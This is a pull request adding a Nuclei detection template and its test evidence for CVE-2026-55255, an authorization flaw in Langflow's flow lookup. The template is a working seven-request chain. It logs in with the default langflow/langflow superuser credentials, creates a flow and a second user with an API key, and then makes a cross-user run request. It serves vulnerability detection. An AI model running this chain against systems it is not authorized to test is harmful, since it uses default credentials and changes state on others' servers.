### PR TITLE
Add CVE-2026-55255 template: Langflow cross-user flow IDOR (complete self-contained POC)

### DIFF
--- a/http/cves/2026/CVE-2026-55255.yaml
+++ b/http/cves/2026/CVE-2026-55255.yaml
@@ -1,0 +1,216 @@
+id: CVE-2026-55255
+
+info:
+  name: Langflow < 1.9.1 - IDOR in Flow Lookup Allowing Cross-User Flow Access
+  author: mohamed-bashir-dev,yzeirnials,LeftenantZero,Zwique
+  severity: high
+  description: |
+    Langflow is an open-source low-code framework for building agentic AI workflows.
+    In versions prior to 1.9.1, the flow-resolution helper get_flow_by_id_or_endpoint_name()
+    performs a UUID lookup with session.get(Flow, flow_id) without verifying that the
+    authenticated caller owns the flow. Any authenticated user can therefore resolve,
+    access, and execute any other user's flow by guessing or knowing its UUID
+    (CWE-639, authorization bypass through user-controlled key). The flaw is reachable
+    through the /api/v1/run* routes and the /api/v1/responses endpoint. It is fixed in
+    1.9.1, where flow lookups are scoped to the authenticated user and cross-user
+    lookups fail closed with 404.
+
+    The template is a complete, self-contained POC on installations that still run the
+    default AUTO_LOGIN superuser (langflow/langflow): it logs in with the default
+    credentials, creates a victim flow (with no components, so it can never execute)
+    and a second regular user with its own API key, then probes the victim flow with
+    the second user's key. On vulnerable versions the flawed helper resolves the
+    cross-owner flow and the in-handler permission check aborts with
+    403 "You do not have permission to run this flow"; on fixed versions the
+    owner-scoped lookup fails first with 404 "Flow identifier ... not found".
+    The probe sends an empty JSON body, which stops before any flow execution on both
+    patched and unpatched servers, so nothing is ever executed.
+  impact: |
+    An authenticated attacker with a valid API key of any regular user can read and
+    execute other users' (including administrators') flows. Because flows frequently
+    hold prompts, credentials, and integrations, this leads to disclosure of sensitive
+    flow configurations and unauthorized execution of victim workflows, up to full
+    server-side compromise depending on the components the victim flows use. The
+    vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
+  remediation: |
+    Update to Langflow 1.9.1 or later, which scopes flow lookups to the requesting
+    user (langflow-base >= 0.9.1), and replace the default AUTO_LOGIN superuser
+    credentials.
+  reference:
+    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-qrpv-q767-xqq2
+    - https://github.com/langflow-ai/langflow/commit/2c9f498d664a3c32698b57d7c5e752625291060e
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-55255
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L
+    cvss-score: 8.4
+    cve-id: CVE-2026-55255
+    cwe-id: CWE-639
+  metadata:
+    verified: true
+    max-request: 7
+    fofa-query: title="Langflow"
+    shodan-query: title:"Langflow"
+  tags: cve,cve2026,langflow,idor,authenticated,kev
+
+variables:
+  username: "langflow"
+  password: "langflow"
+  attacker_user: "nuclei_{{rand_base(6)}}"
+  attacker_pass: "Nuclei-{{rand_base(10)}}-1"
+
+flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) && http(7)
+
+http:
+  # authenticate as the default AUTO_LOGIN superuser
+  - raw:
+      - |
+        POST /api/v1/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+    extractors:
+      - type: regex
+        name: super_token
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"access_token"\s*:\s*"([^"]+)"'
+
+  # create a victim flow owned by the superuser (no components, can never execute)
+  - raw:
+      - |
+        POST /api/v1/flows/ HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{super_token}}
+        Content-Type: application/json
+
+        {"name":"nuclei_{{rand_base(6)}}","data":{"nodes":[],"edges":[],"viewport":{"x":0,"y":0,"zoom":1}}}
+
+    matchers:
+      - type: status
+        status:
+          - 201
+        internal: true
+    extractors:
+      - type: regex
+        name: victim_flow_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"id"\s*:\s*"([^"]+)"'
+
+  # register a second, non-privileged user (inactive until activated)
+  - raw:
+      - |
+        POST /api/v1/users/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"username":"{{attacker_user}}","password":"{{attacker_pass}}"}
+
+    matchers:
+      - type: status
+        status:
+          - 201
+        internal: true
+    extractors:
+      - type: regex
+        name: attacker_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"id"\s*:\s*"([^"]+)"'
+
+  # superuser activates the second user
+  - raw:
+      - |
+        PATCH /api/v1/users/{{attacker_id}} HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{super_token}}
+        Content-Type: application/json
+
+        {"is_active":true}
+
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+
+  # second user login
+  - raw:
+      - |
+        POST /api/v1/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{attacker_user}}&password={{attacker_pass}}
+
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+    extractors:
+      - type: regex
+        name: attacker_token
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"access_token"\s*:\s*"([^"]+)"'
+
+  # second user creates its own API key
+  - raw:
+      - |
+        POST /api/v1/api_key/ HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{attacker_token}}
+        Content-Type: application/json
+
+        {"name":"nuclei_{{rand_base(6)}}"}
+
+    matchers:
+      - type: status
+        status:
+          - 200
+        internal: true
+    extractors:
+      - type: regex
+        name: attacker_api_key
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"api_key"\s*:\s*"([^"]+)"'
+
+  # non-executing IDOR probe: vulnerable resolves the cross-owner flow and aborts
+  # at the permission check (403), fixed fails closed at the owner-scoped lookup (404)
+  - raw:
+      - |
+        POST /api/v1/run/{{victim_flow_id}} HTTP/1.1
+        Host: {{Hostname}}
+        x-api-key: {{attacker_api_key}}
+        Content-Type: application/json
+
+        {}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 403
+
+      - type: word
+        words:
+          - "You do not have permission to run this flow"


### PR DESCRIPTION
## Summary
Re-submission of #17180 (closed for lacking a complete POC) — thank you @theamanrawat for the guidance. This version is a **fully self-contained POC**: no operator-supplied variables, the chain bootstraps everything it needs from the target itself and ends in a guaranteed-match-or-no-match probe.

**CVE-2026-55255** (GHSA-qrpv-q767-xqq2, CVSS 8.4, CWE-639, KEV since 2026-07-07): in Langflow < 1.9.1, `get_flow_by_id_or_endpoint_name()` resolves UUID lookups with `session.get(Flow, flow_id)` without an owner check, so any authenticated user can resolve/access/execute any other user's flow by UUID.

## Complete POC chain (7 requests, same default-credential approach as the merged CVE-2026-0770 Langflow template)
1. `POST /api/v1/login` with the default AUTO_LOGIN superuser (`langflow`/`langflow`) → superuser token
2. `POST /api/v1/flows/` → victim flow owned by the superuser (**zero components**, so it can never execute)
3. `POST /api/v1/users/` → registers a second, non-privileged user (random name via `rand_base`, inactive by default per `NEW_USER_IS_ACTIVE=false`)
4. `PATCH /api/v1/users/{id}` (superuser) → activates it
5. `POST /api/v1/login` → attacker token
6. `POST /api/v1/api_key/` → attacker API key
7. **IDOR probe**: `POST /api/v1/run/{victim_flow_id}` with the attacker's `x-api-key` and an **empty JSON body**

If the default credentials have been changed (hardened target), request 1 fails and the template stops after a single request — no false positives.

## Discriminator (non-executing on both versions)
- **Vulnerable (< 1.9.1):** the flawed helper resolves the cross-owner flow, then the in-handler permission check aborts **before body parsing/execution** with `403 {"detail":"You do not have permission to run this flow"}` — that exact 403 can only occur when the server resolved a flow owned by a different user.
- **Fixed (≥ 1.9.1):** owner-scoped lookup fails closed first with `404 {"detail":"Flow identifier … not found"}`.
- Empty body is rejected before flow execution on vulnerable versions; the victim flow we create has no components, so nothing can ever run. This 403-vs-404 oracle is the same one documented in the fix commit's regression tests.

## Validation evidence (localhost instances, full `nuclei -debug` transcripts below)
- **TP — Langflow 1.9.0 (langflow-base 0.9.0, versions pinned per the paired-release packaging):** all 7 requests succeed, final probe `403` + permission message → **1 match**. Re-ran twice; random usernames/flow names make it re-runnable.
- **TN — Langflow 1.9.1 (langflow-base 0.9.1):** identical chain succeeds, final probe `404 Flow identifier … not found` → **0 matches**.
- `nuclei -validate`: pass.

<details>
<summary>TP debug excerpt (1.9.0)</summary>

```
[CVE-2026-55255] Dumped HTTP request … /api/v1/run/35f0bdf4-712e-449c-a963-6e88d5bebddc
x-api-key: sk-Mm9J…
{}
HTTP/1.1 403 Forbidden
{"detail":"You do not have permission to run this flow"}
[CVE-2026-55255] [http] [high] http://127.0.0.1:7860/api/v1/run/…
[INF] Scan completed. 1 matches found.
```
</details>

<details>
<summary>TN debug excerpt (1.9.1)</summary>

```
[CVE-2026-55255] Dumped HTTP response … /api/v1/run/137e968f-…
HTTP/1.1 404 Not Found
{"detail":"Flow identifier 137e968f-… not found"}
[INF] Scan completed. 0 matches found.
```
</details>

## Credits
Reporters `yzeirnials`, `LeftenantZero`, `Zwique` (per GHSA-qrpv-q767-xqq2 advisory credits) + `mohamed-bashir-dev` (template).

References:
- https://github.com/langflow-ai/langflow/security/advisories/GHSA-qrpv-q767-xqq2
- https://github.com/langflow-ai/langflow/commit/2c9f498d664a3c32698b57d7c5e752625291060e
- https://nvd.nist.gov/vuln/detail/CVE-2026-55255